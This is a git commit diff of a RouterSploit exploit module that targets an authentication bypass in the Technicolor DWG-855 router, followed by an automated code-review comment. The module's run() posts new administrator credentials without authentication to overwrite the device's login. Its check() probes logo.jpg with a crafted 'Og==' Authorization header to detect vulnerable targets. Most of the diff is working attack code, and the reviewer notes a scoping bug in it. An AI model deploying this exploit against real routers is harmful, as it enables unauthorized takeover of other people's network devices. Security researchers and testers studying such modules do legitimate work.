Commit 2d2b24c2 by 0BuRner Committed by GitHub

Update dwg855_authbypass.py

parent ca1f5377
import base64 import binascii
from routersploit import( from routersploit import (
exploits, exploits,
print_success, print_success,
print_error, print_error,
print_status,
sanitize_url, sanitize_url,
http_request, http_request,
mute
) )
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability. Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
...@@ -16,10 +17,10 @@ class Exploit(exploits.Exploit): ...@@ -16,10 +17,10 @@ class Exploit(exploits.Exploit):
""" """
__info__ = { __info__ = {
'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.', 'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.\nNOTE2: run \"check\" after runing module to see if it worked.', 'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
'authors': [ 'author': [
'JPaulMora', # vulnerability discovery 'JPaulMora <https://JPaulMora.GitHub.io>',
'JPaulMora <https://JPaulMora.GitHub.io>', # routersploit module # vulnerability discovery,routersploit module
], ],
'references': [ 'references': [
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.', 'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
...@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit): ...@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit):
npass = exploits.Option('rpass', 'Overwrite old password with.. ') npass = exploits.Option('rpass', 'Overwrite old password with.. ')
def run(self): def run(self):
print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'} headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId":self.nuser, "Password":self.npass, "PasswordReEnter":self.npass, "RestoreFactoryNo":"0x00"} data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
response = http_request(method="POST", url=url, headers=headers, data=data) response = http_request(method="POST", url=url, headers=headers, data=data)
return ""
@mute if response is None:
print_error("Target didn't answer request.")
elif vulnresp in response.text.encode('utf-8'):
print_success("Credentials changed!")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
print_error("Unknown error, submit an issue.")
def check(self): def check(self):
url = sanitize_url("{}:{}/RgConnect.asp".format(self.target, self.port))
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = binascii.unhexlify('114475636b7900') # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
authorization = 'Basic {}'.format(base64.b64encode(self.nuser + ':' + self.npass))
headers = {'User-Agent': user_agent, headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive', 'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate', 'Accept-Encoding': 'gzip, deflate',
'Authorization': authorization, 'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache', 'Cache-Control': 'no-cache',
'Connection': 'close'} 'Connection': 'close'}
...@@ -60,7 +72,9 @@ class Exploit(exploits.Exploit): ...@@ -60,7 +72,9 @@ class Exploit(exploits.Exploit):
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 401: elif vulnresp in response.text.encode('utf-8'):
return True # device is vulnerable
elif response.status_code == 401:
return False # target is not vulnerable return False # target is not vulnerable
else: else:
return True # device is vulnerable return False # target is not vulnerable
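Review bot: `run()` tests `elif vulnresp in response.text.encode('utf-8'):`, but `vulnresp` is only bound as a local inside `check()` (`vulnresp = binascii.unhexlify('114475636b7900')`) and nothing in the visible top of the file defines it at module level, so any target that answers the POST raises NameError before `print_success`/`print_error` is reached. Hoist the marker to a single module-level constant, e.g. `VULN_MARKER = binascii.unhexlify('114475636b7900')  # 0x11 "Ducky" 0x00 found in logo.jpg`, and reference it from both methods. Compare against `response.content` rather than `response.text.encode('utf-8')`: logo.jpg is binary, and round-tripping it through text decoding only works here because the marker bytes happen to be ASCII. It is also not obvious that the POST to `/goform/RgSecurity` returns the logo bytes at all; if the intent is "verify the new credentials work", have `run()` call `self.check()` instead of duplicating the comparison. Finally, the `check()` header now sends `'Authorization': 'Og=='` with no `Basic ` scheme prefix; if the bypass depends on that malformed value, state it in the comment, otherwise restore `'Basic Og=='`.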